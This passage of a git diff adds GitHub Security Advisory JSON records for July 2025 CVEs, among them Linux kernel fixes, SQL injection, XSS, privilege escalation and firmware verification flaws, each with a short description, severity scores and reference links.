a/advisories/unreviewed/2025/07/GHSA-495q-r22g-59m9/GHSA-495q-r22g-59m9.json b/advisories/unreviewed/2025/07/GHSA-495q-r22g-59m9/GHSA-495q-r22g-59m9.json new file mode 100644 index 0000000000000..c2e4c42bdb6ec --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-495q-r22g-59m9/GHSA-495q-r22g-59m9.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-495q-r22g-59m9", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38368" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: tps6594-pfsm: Add NULL pointer check in tps6594_pfsm_probe()\n\nThe returned value, pfsm->miscdev.name, from devm_kasprintf()\ncould be NULL.\nA pointer check is added to prevent potential NULL pointer dereference.\nThis is similar to the fix in commit 3027e7b15b02\n(\"ice: Fix some null pointer dereference issues in ice_ptp.c\").\n\nThis issue is found by our static analysis tool.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38368" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a10c8bff454b11ef553d9df19ee722d2df34cd0e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a8d1b4f219e8833130927f19d1c8bfbf49215ce4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a99b598d836c9c6411110c70a2da134c78d96e67" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d27ee5c59881a64ea92e363502742cb4f38b7460" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4fc7-q565-7p9g/GHSA-4fc7-q565-7p9g.json b/advisories/unreviewed/2025/07/GHSA-4fc7-q565-7p9g/GHSA-4fc7-q565-7p9g.json new file mode 100644 index 0000000000000..7171a99ac0ac0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4fc7-q565-7p9g/GHSA-4fc7-q565-7p9g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fc7-q565-7p9g", + "modified": "2025-07-25T15:30:45Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-4784" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Moderec Tourtella allows SQL Injection.This issue affects Tourtella: before 26.05.2025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4784" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-25-0176" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T14:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4fjg-wrmh-r9ch/GHSA-4fjg-wrmh-r9ch.json b/advisories/unreviewed/2025/07/GHSA-4fjg-wrmh-r9ch/GHSA-4fjg-wrmh-r9ch.json new file mode 100644 index 0000000000000..15b1636dff29f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4fjg-wrmh-r9ch/GHSA-4fjg-wrmh-r9ch.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fjg-wrmh-r9ch", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-4968" + ], + "details": "The WPBakery Page Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple Page Builder elements (Copyright Element, Hover Box, Separator With Text, FAQ, Single Image, Custom Header, Button, Call To Action, Progress Bar, Pie Chart, Round Chart, and Line Chart) in all versions up to, and including, 8.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4968" + }, + { + "type": "WEB", + "url": "https://kb.wpbakery.com/docs/preface/release-notes" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/10945855-675a-4a85-8bb2-84bc40c1b826?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T07:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4j4w-3wcx-mxg6/GHSA-4j4w-3wcx-mxg6.json b/advisories/unreviewed/2025/07/GHSA-4j4w-3wcx-mxg6/GHSA-4j4w-3wcx-mxg6.json new file mode 100644 index 0000000000000..9340186615076 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4j4w-3wcx-mxg6/GHSA-4j4w-3wcx-mxg6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4j4w-3wcx-mxg6", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38413" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: xsk: rx: fix the frame's length check\n\nWhen calling buf_to_xdp, the len argument is the frame data's length\nwithout virtio header's length (vi->hdr_len). We check that len with\n\n\txsk_pool_get_rx_frame_size() + vi->hdr_len\n\nto ensure the provided len does not larger than the allocated chunk\nsize. The additional vi->hdr_len is because in virtnet_add_recvbuf_xsk,\nwe use part of XDP_PACKET_HEADROOM for virtio header and ask the vhost\nto start placing data from\n\n\thard_start + XDP_PACKET_HEADROOM - vi->hdr_len\nnot\n\thard_start + XDP_PACKET_HEADROOM\n\nBut the first buffer has virtio_header, so the maximum frame's length in\nthe first buffer can only be\n\n\txsk_pool_get_rx_frame_size()\nnot\n\txsk_pool_get_rx_frame_size() + vi->hdr_len\n\nlike in the current check.\n\nThis commit adds an additional argument to buf_to_xdp differentiate\nbetween the first buffer and other ones to correctly calculate the maximum\nframe's length.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38413" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5177373c31318c3c6a190383bfd232e6cf565c36" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6013bb6bc24c2cac3f45b37a15b71b232a5b00ff" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/892f6ed9a4a38bb3360fdff091b9241cfa105b61" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4jq7-688w-w4r4/GHSA-4jq7-688w-w4r4.json b/advisories/unreviewed/2025/07/GHSA-4jq7-688w-w4r4/GHSA-4jq7-688w-w4r4.json new file mode 100644 index 0000000000000..37e485442acd3 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4jq7-688w-w4r4/GHSA-4jq7-688w-w4r4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jq7-688w-w4r4", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-26397" + ], + "details": "SolarWinds Observability Self-Hosted is susceptible to Deserialization of Untrusted Data Local Privilege Escalation vulnerability. An attacker with low privileges can escalate privileges to run malicious files copied to a permission-protected folder. This vulnerability requires authentication from a low-level account and local access to the host server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26397" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/solarwinds_platform_2025-2-1_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-26397" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T08:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4w5g-r898-rj85/GHSA-4w5g-r898-rj85.json b/advisories/unreviewed/2025/07/GHSA-4w5g-r898-rj85/GHSA-4w5g-r898-rj85.json new file mode 100644 index 0000000000000..39970cbcea6c8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4w5g-r898-rj85/GHSA-4w5g-r898-rj85.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w5g-r898-rj85", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38365" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix a race between renames and directory logging\n\nWe have a race between a rename and directory inode logging that if it\nhappens and we crash/power fail before the rename completes, the next time\nthe filesystem is mounted, the log replay code will end up deleting the\nfile that was being renamed.\n\nThis is best explained following a step by step analysis of an interleaving\nof steps that lead into this situation.\n\nConsider the initial conditions:\n\n1) We are at transaction N;\n\n2) We have directories A and B created in a past transaction (< N);\n\n3) We have inode X corresponding to a file that has 2 hardlinks, one in\n directory A and the other in directory B, so we'll name them as\n \"A/foo_link1\" and \"B/foo_link2\". Both hard links were persisted in a\n past transaction (< N);\n\n4) We have inode Y corresponding to a file that as a single hard link and\n is located in directory A, we'll name it as \"A/bar\". This file was also\n persisted in a past transaction (< N).\n\nThe steps leading to a file loss are the following and for all of them we\nare under transaction N:\n\n 1) Link \"A/foo_link1\" is removed, so inode's X last_unlink_trans field\n is updated to N, through btrfs_unlink() -> btrfs_record_unlink_dir();\n\n 2) Task A starts a rename for inode Y, with the goal of renaming from\n \"A/bar\" to \"A/baz\", so we enter btrfs_rename();\n\n 3) Task A inserts the new BTRFS_INODE_REF_KEY for inode Y by calling\n btrfs_insert_inode_ref();\n\n 4) Because the rename happens in the same directory, we don't set the\n last_unlink_trans field of directoty A's inode to the current\n transaction id, that is, we don't cal btrfs_record_unlink_dir();\n\n 5) Task A then removes the entries from directory A (BTRFS_DIR_ITEM_KEY\n and BTRFS_DIR_INDEX_KEY items) when calling __btrfs_unlink_inode()\n (actually the dir index item is added as a delayed item, but the\n effect is the same);\n\n 6) Now before task A adds the new entry \"A/baz\" to directory A by\n calling btrfs_add_link(), another task, task B is logging inode X;\n\n 7) Task B starts a fsync of inode X and after logging inode X, at\n btrfs_log_inode_parent() it calls btrfs_log_all_parents(), since\n inode X has a last_unlink_trans value of N, set at in step 1;\n\n 8) At btrfs_log_all_parents() we search for all parent directories of\n inode X using the commit root, so we find directories A and B and log\n them. Bu when logging direct A, we don't have a dir index item for\n inode Y anymore, neither the old name \"A/bar\" nor for the new name\n \"A/baz\" since the rename has deleted the old name but has not yet\n inserted the new name - task A hasn't called yet btrfs_add_link() to\n do that.\n\n Note that logging directory A doesn't fallback to a transaction\n commit because its last_unlink_trans has a lower value than the\n current transaction's id (see step 4);\n\n 9) Task B finishes logging directories A and B and gets back to\n btrfs_sync_file() where it calls btrfs_sync_log() to persist the log\n tree;\n\n10) Task B successfully persisted the log tree, btrfs_sync_log() completed\n with success, and a power failure happened.\n\n We have a log tree without any directory entry for inode Y, so the\n log replay code deletes the entry for inode Y, name \"A/bar\", from the\n subvolume tree since it doesn't exist in the log tree and the log\n tree is authorative for its index (we logged a BTRFS_DIR_LOG_INDEX_KEY\n item that covers the index range for the dentry that corresponds to\n \"A/bar\").\n\n Since there's no other hard link for inode Y and the log replay code\n deletes the name \"A/bar\", the file is lost.\n\nThe issue wouldn't happen if task B synced the log only after task A\ncalled btrfs_log_new_name(), which would update the log with the new name\nfor inode Y (\"A/bar\").\n\nFix this by pinning the log root during renames before removing the old\ndirectory entry, and unpinning af\n---truncated---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38365" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2088895d5903082bb9021770b919e733c57edbc1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3ca864de852bc91007b32d2a0d48993724f4abad" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/51bd363c7010d033d3334daf457c824484bf9bf0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c6874646c21bd820cf475e2874e62c133954023" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aeeae8feeaae4445a86f9815273e81f902dc1f5b" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-53qv-xvfg-rjr9/GHSA-53qv-xvfg-rjr9.json b/advisories/unreviewed/2025/07/GHSA-53qv-xvfg-rjr9/GHSA-53qv-xvfg-rjr9.json new file mode 100644 index 0000000000000..4f634c040f7ba --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-53qv-xvfg-rjr9/GHSA-53qv-xvfg-rjr9.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-53qv-xvfg-rjr9", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38419" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nremoteproc: core: Cleanup acquired resources when rproc_handle_resources() fails in rproc_attach()\n\nWhen rproc->state = RPROC_DETACHED and rproc_attach() is used\nto attach to the remote processor, if rproc_handle_resources()\nreturns a failure, the resources allocated by imx_rproc_prepare()\nshould be released, otherwise the following memory leak will occur.\n\nSince almost the same thing is done in imx_rproc_prepare() and\nrproc_resource_cleanup(), Function rproc_resource_cleanup() is able\nto deal with empty lists so it is better to fix the \"goto\" statements\nin rproc_attach(). replace the \"unprepare_device\" goto statement with\n\"clean_up_resources\" and get rid of the \"unprepare_device\" label.\n\nunreferenced object 0xffff0000861c5d00 (size 128):\ncomm \"kworker/u12:3\", pid 59, jiffies 4294893509 (age 149.220s)\nhex dump (first 32 bytes):\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n00 00 02 88 00 00 00 00 00 00 10 00 00 00 00 00 ............\nbacktrace:\n [<00000000f949fe18>] slab_post_alloc_hook+0x98/0x37c\n [<00000000adbfb3e7>] __kmem_cache_alloc_node+0x138/0x2e0\n [<00000000521c0345>] kmalloc_trace+0x40/0x158\n [<000000004e330a49>] rproc_mem_entry_init+0x60/0xf8\n [<000000002815755e>] imx_rproc_prepare+0xe0/0x180\n [<0000000003f61b4e>] rproc_boot+0x2ec/0x528\n [<00000000e7e994ac>] rproc_add+0x124/0x17c\n [<0000000048594076>] imx_rproc_probe+0x4ec/0x5d4\n [<00000000efc298a1>] platform_probe+0x68/0xd8\n [<00000000110be6fe>] really_probe+0x110/0x27c\n [<00000000e245c0ae>] __driver_probe_device+0x78/0x12c\n [<00000000f61f6f5e>] driver_probe_device+0x3c/0x118\n [<00000000a7874938>] __device_attach_driver+0xb8/0xf8\n [<0000000065319e69>] bus_for_each_drv+0x84/0xe4\n [<00000000db3eb243>] __device_attach+0xfc/0x18c\n [<0000000072e4e1a4>] device_initial_probe+0x14/0x20", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38419" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5434d9f2fd68722b514c14b417b53a8af02c4d24" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7692c9fbedd9087dc9050903f58095915458d9b1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/82208ce9505abb057afdece7c62a14687c52c9ca" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/92776ca0ccfe78b9bfe847af206bad641fb11121" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9515d74c9d1ae7308a02e8bd4f894eb8137cf8df" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c56d6ef2711ee51b54f160ad0f25a381561f0287" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-54gr-cf5g-5pjm/GHSA-54gr-cf5g-5pjm.json b/advisories/unreviewed/2025/07/GHSA-54gr-cf5g-5pjm/GHSA-54gr-cf5g-5pjm.json new file mode 100644 index 0000000000000..381b10bdb704f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-54gr-cf5g-5pjm/GHSA-54gr-cf5g-5pjm.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54gr-cf5g-5pjm", + "modified": "2025-07-25T15:30:41Z", + "published": "2025-07-25T15:30:41Z", + "aliases": [ + "CVE-2025-1299" + ], + "details": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.4 before 18.0.5, all versions starting from 18.1 before 18.1.3, all versions starting from 18.2 before 18.2.1 that, under circumstances, could have allowed an unauthorized user to read deployment job logs by sending a crafted request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1299" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2969145" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/519696" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T07:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-56gq-m2m7-qc85/GHSA-56gq-m2m7-qc85.json b/advisories/unreviewed/2025/07/GHSA-56gq-m2m7-qc85/GHSA-56gq-m2m7-qc85.json new file mode 100644 index 0000000000000..c1816b1567428 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-56gq-m2m7-qc85/GHSA-56gq-m2m7-qc85.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56gq-m2m7-qc85", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-45467" + ], + "details": "Unitree Go1 <= Go1_2022_05_11 is vulnerable to Insecure Permissions as the firmware update functionality (via Wi-Fi/Ethernet) implements an insecure verification mechanism that solely relies on MD5 checksums for firmware integrity validation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45467" + }, + { + "type": "WEB", + "url": "https://github.com/zgsnj123/CVE-2025-45467/tree/main" + }, + { + "type": "WEB", + "url": "https://www.unitree.com/cn/go1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-585v-w359-6rw5/GHSA-585v-w359-6rw5.json b/advisories/unreviewed/2025/07/GHSA-585v-w359-6rw5/GHSA-585v-w359-6rw5.json new file mode 100644 index 0000000000000..6d9e6c42fb8f0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-585v-w359-6rw5/GHSA-585v-w359-6rw5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-585v-w359-6rw5", + "modified": "2025-07-25T15:30:55Z", + "published": "2025-07-25T15:30:55Z", + "aliases": [ + "CVE-2025-52360" + ], + "details": "A Cross-Site Scripting (XSS) vulnerability exists in the OPAC search feature of Koha Library Management System v24.05. Unsanitized input entered in the search field is reflected in the search history interface, leading to the execution of arbitrary JavaScript in the browser context when the user interacts with the interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52360" + }, + { + "type": "WEB", + "url": "https://gist.github.com/MerttTuran/32289a1d3c173f0b7934237c1696bef1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-58vg-w4wx-wp6p/GHSA-58vg-w4wx-wp6p.json b/advisories/unreviewed/2025/07/GHSA-58vg-w4wx-wp6p/GHSA-58vg-w4wx-wp6p.json new file mode 100644 index 0000000000000..b8d2fd67bf485 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-58vg-w4wx-wp6p/GHSA-58vg-w4wx-wp6p.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58vg-w4wx-wp6p", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38388" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: arm_ffa: Replace mutex with rwlock to avoid sleep in atomic context\n\nThe current use of a mutex to protect the notifier hashtable accesses\ncan lead to issues in the atomic context. It results in the below\nkernel warnings:\n\n | BUG: sleeping function called from invalid context at kernel/locking/mutex.c:258\n | in_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 9, name: kworker/0:0\n | preempt_count: 1, expected: 0\n | RCU nest depth: 0, expected: 0\n | CPU: 0 UID: 0 PID: 9 Comm: kworker/0:0 Not tainted 6.14.0 #4\n | Workqueue: ffa_pcpu_irq_notification notif_pcpu_irq_work_fn\n | Call trace:\n | show_stack+0x18/0x24 (C)\n | dump_stack_lvl+0x78/0x90\n | dump_stack+0x18/0x24\n | __might_resched+0x114/0x170\n | __might_sleep+0x48/0x98\n | mutex_lock+0x24/0x80\n | handle_notif_callbacks+0x54/0xe0\n | notif_get_and_handle+0x40/0x88\n | generic_exec_single+0x80/0xc0\n | smp_call_function_single+0xfc/0x1a0\n | notif_pcpu_irq_work_fn+0x2c/0x38\n | process_one_work+0x14c/0x2b4\n | worker_thread+0x2e4/0x3e0\n | kthread+0x13c/0x210\n | ret_from_fork+0x10/0x20\n\nTo address this, replace the mutex with an rwlock to protect the notifier\nhashtable accesses. This ensures that read-side locking does not sleep and\nmultiple readers can acquire the lock concurrently, avoiding unnecessary\ncontention and potential deadlocks. Writer access remains exclusive,\npreserving correctness.\n\nThis change resolves warnings from lockdep about potential sleep in\natomic context.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38388" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/31405510a48dcf054abfa5b7b8d70ce1b27d1f13" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8986f8f61b482c0e6efd28f0b2423d9640c20eb1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9ca7a421229bbdfbe2e1e628cff5cfa782720a10" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5g77-7644-h27q/GHSA-5g77-7644-h27q.json b/advisories/unreviewed/2025/07/GHSA-5g77-7644-h27q/GHSA-5g77-7644-h27q.json new file mode 100644 index 0000000000000..26606d933bd90 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5g77-7644-h27q/GHSA-5g77-7644-h27q.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g77-7644-h27q", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38357" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix runtime warning on truncate_folio_batch_exceptionals()\n\nThe WARN_ON_ONCE is introduced on truncate_folio_batch_exceptionals() to\ncapture whether the filesystem has removed all DAX entries or not.\n\nAnd the fix has been applied on the filesystem xfs and ext4 by the commit\n0e2f80afcfa6 (\"fs/dax: ensure all pages are idle prior to filesystem\nunmount\").\n\nApply the missed fix on filesystem fuse to fix the runtime warning:\n\n[ 2.011450] ------------[ cut here ]------------\n[ 2.011873] WARNING: CPU: 0 PID: 145 at mm/truncate.c:89 truncate_folio_batch_exceptionals+0x272/0x2b0\n[ 2.012468] Modules linked in:\n[ 2.012718] CPU: 0 UID: 1000 PID: 145 Comm: weston Not tainted 6.16.0-rc2-WSL2-STABLE #2 PREEMPT(undef)\n[ 2.013292] RIP: 0010:truncate_folio_batch_exceptionals+0x272/0x2b0\n[ 2.013704] Code: 48 63 d0 41 29 c5 48 8d 1c d5 00 00 00 00 4e 8d 6c 2a 01 49 c1 e5 03 eb 09 48 83 c3 08 49 39 dd 74 83 41 f6 44 1c 08 01 74 ef <0f> 0b 49 8b 34 1e 48 89 ef e8 10 a2 17 00 eb df 48 8b 7d 00 e8 35\n[ 2.014845] RSP: 0018:ffffa47ec33f3b10 EFLAGS: 00010202\n[ 2.015279] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000\n[ 2.015884] RDX: 0000000000000000 RSI: ffffa47ec33f3ca0 RDI: ffff98aa44f3fa80\n[ 2.016377] RBP: ffff98aa44f3fbf0 R08: ffffa47ec33f3ba8 R09: 0000000000000000\n[ 2.016942] R10: 0000000000000001 R11: 0000000000000000 R12: ffffa47ec33f3ca0\n[ 2.017437] R13: 0000000000000008 R14: ffffa47ec33f3ba8 R15: 0000000000000000\n[ 2.017972] FS: 000079ce006afa40(0000) GS:ffff98aade441000(0000) knlGS:0000000000000000\n[ 2.018510] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 2.018987] CR2: 000079ce03e74000 CR3: 000000010784f006 CR4: 0000000000372eb0\n[ 2.019518] Call Trace:\n[ 2.019729] \n[ 2.019901] truncate_inode_pages_range+0xd8/0x400\n[ 2.020280] ? timerqueue_add+0x66/0xb0\n[ 2.020574] ? get_nohz_timer_target+0x2a/0x140\n[ 2.020904] ? timerqueue_add+0x66/0xb0\n[ 2.021231] ? timerqueue_del+0x2e/0x50\n[ 2.021646] ? __remove_hrtimer+0x39/0x90\n[ 2.022017] ? srso_alias_untrain_ret+0x1/0x10\n[ 2.022497] ? psi_group_change+0x136/0x350\n[ 2.023046] ? _raw_spin_unlock+0xe/0x30\n[ 2.023514] ? finish_task_switch.isra.0+0x8d/0x280\n[ 2.024068] ? __schedule+0x532/0xbd0\n[ 2.024551] fuse_evict_inode+0x29/0x190\n[ 2.025131] evict+0x100/0x270\n[ 2.025641] ? _atomic_dec_and_lock+0x39/0x50\n[ 2.026316] ? __pfx_generic_delete_inode+0x10/0x10\n[ 2.026843] __dentry_kill+0x71/0x180\n[ 2.027335] dput+0xeb/0x1b0\n[ 2.027725] __fput+0x136/0x2b0\n[ 2.028054] __x64_sys_close+0x3d/0x80\n[ 2.028469] do_syscall_64+0x6d/0x1b0\n[ 2.028832] ? clear_bhb_loop+0x30/0x80\n[ 2.029182] ? clear_bhb_loop+0x30/0x80\n[ 2.029533] ? clear_bhb_loop+0x30/0x80\n[ 2.029902] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[ 2.030423] RIP: 0033:0x79ce03d0d067\n[ 2.030820] Code: b8 ff ff ff ff e9 3e ff ff ff 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 41 c3 48 83 ec 18 89 7c 24 0c e8 c3 a7 f8 ff\n[ 2.032354] RSP: 002b:00007ffef0498948 EFLAGS: 00000246 ORIG_RAX: 0000000000000003\n[ 2.032939] RAX: ffffffffffffffda RBX: 00007ffef0498960 RCX: 000079ce03d0d067\n[ 2.033612] RDX: 0000000000000003 RSI: 0000000000001000 RDI: 000000000000000d\n[ 2.034289] RBP: 00007ffef0498a30 R08: 000000000000000d R09: 0000000000000000\n[ 2.034944] R10: 00007ffef0498978 R11: 0000000000000246 R12: 0000000000000001\n[ 2.035610] R13: 00007ffef0498960 R14: 000079ce03e09ce0 R15: 0000000000000003\n[ 2.036301] \n[ 2.036532] ---[ end trace 0000000000000000 ]---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38357" + }, + { + "type": "WEB", + "url": 